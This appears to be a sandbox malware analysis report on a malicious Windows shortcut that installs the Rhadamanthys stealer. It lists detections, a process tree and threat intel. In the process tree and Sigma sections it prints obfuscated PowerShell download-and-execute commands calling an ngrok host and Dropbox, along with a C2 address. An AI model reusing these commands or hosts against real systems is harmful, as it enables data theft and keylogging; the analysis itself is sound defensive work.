Edit tour

Windows Analysis Report
pkqLAMAv96.lnk

Overview

General Information

Sample name:	pkqLAMAv96.lnk renamed because original name is a hash value
Original sample name:	09f8248e67a54fec5a43f9afe0924963a7ab783c16481a2801519c2d14ed8ee1(1).lnk
Analysis ID:	1576697
MD5:	9436a53ad2403b16af623a46efe0aaf2
SHA1:	2beb0c794491ef17fe11d4ea531e1ed725487a82
SHA256:	09f8248e67a54fec5a43f9afe0924963a7ab783c16481a2801519c2d14ed8ee1
Tags:	Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected RHADAMANTHYS Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Powerup Write Hijack DLL

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Windows shortcut file (LNK) contains suspicious command line arguments

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Detected suspicious crossdomain redirect

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

cmd.exe (PID: 4300 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4200 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)

msedge.exe (PID: 3908 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=2060,i,3314031829294604872,3395366373032741599,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 8296 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8376 cmdline: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }" MD5: 04029E121A0CFA5991749937DD22A1D9)

msedge.exe (PID: 6692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\39350554-cb9f-4577-be49-6b699e44992e.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8232 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1452,i,12575340364817014389,13679646313272549984,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

f403e587-89ca-44df-ac2b-662ec52ae877.exe (PID: 8552 cmdline: "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7)

f403e587-89ca-44df-ac2b-662ec52ae877.exe (PID: 8692 cmdline: "C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7)

fontdrvhost.exe (PID: 8808 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

fontdrvhost.exe (PID: 5884 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

WerFault.exe (PID: 3136 cmdline: C:\Windows\system32\WerFault.exe -u -p 5884 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 8716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8692 -s 424 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 4660 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msedge.exe (PID: 7176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8852 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8872 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6680 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7324 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5940 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7992 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8448 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6660 --field-trial-handle=2392,i,7157287954465730072,9035919994940198210,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000001C.00000002.2374916826.0000000003080000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001D.00000003.2371047023.0000000005690000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001C.00000003.2363201778.0000000002E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001D.00000003.2367710824.0000000003430000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000001C.00000003.2366537028.00000000055D0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001D.00000002.2472399777.0000000003600000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: f403e587-89ca-44df-ac2b-662ec52ae877.exe PID: 8692	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: fontdrvhost.exe PID: 8808	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
29.3.fontdrvhost.exe.5690000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.3.fontdrvhost.exe.58b0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.55d0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.3.fontdrvhost.exe.58b0000.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.3.fontdrvhost.exe.5690000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.3.fontdrvhost.exe.5690000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4200, TargetFilename: C:\Users\user\AppData\Local\Temp\39750847.bat

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4200, TargetFilename: C:\Users\user\AppData\Local\Temp\39750847.bat

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8296, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }", ProcessId: 8376, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4300, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), ProcessId: 4200, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), ProcessId: 4300, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4300, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing), ProcessId: 4200, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4660, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T12:13:33.232530+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	162.125.65.18	443	TCP
2024-12-17T12:13:47.261558+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49771	162.125.65.18	443	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T12:14:50.017273+0100	2854802	1	Domain Observed Used for C2 Detected	104.161.43.18	2845	192.168.2.8	49839	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 26.2.f403e587-89ca-44df-ac2b-662ec52ae877.exe.2b4569a.1.unpack

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}

Multi AV Scanner detection for submitted file

Source: pkqLAMAv96.lnk

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: pkqLAMAv96.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 3.125.102.39:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.8:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.6.122.107:443 -> 192.168.2.8:49791 version: TLS 1.2

Source:	Binary string: softy.pdb source: powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2297215920.000001D224690000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.2295003833.000001CA22F7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365946962.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365827330.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2370563632.0000000003A00000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2296940479.000001D224642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2297073390.000001D22465A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2297150603.000001D224660000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb3 source: powershell.exe, 0000000F.00000002.2297073390.000001D22465A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366537028.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371047023.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\assassin\assassin-playground\dx10_integration\main\output\win32\exe\scimitar_dx10_f.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000000.2204199824.000000000177E000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.000000000177E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: ntdll.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364591216.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364834495.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369002536.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb> source: powershell.exe, 0000000F.00000002.2297215920.000001D224690000.00000004.00000020.00020000.00000000.sdmp
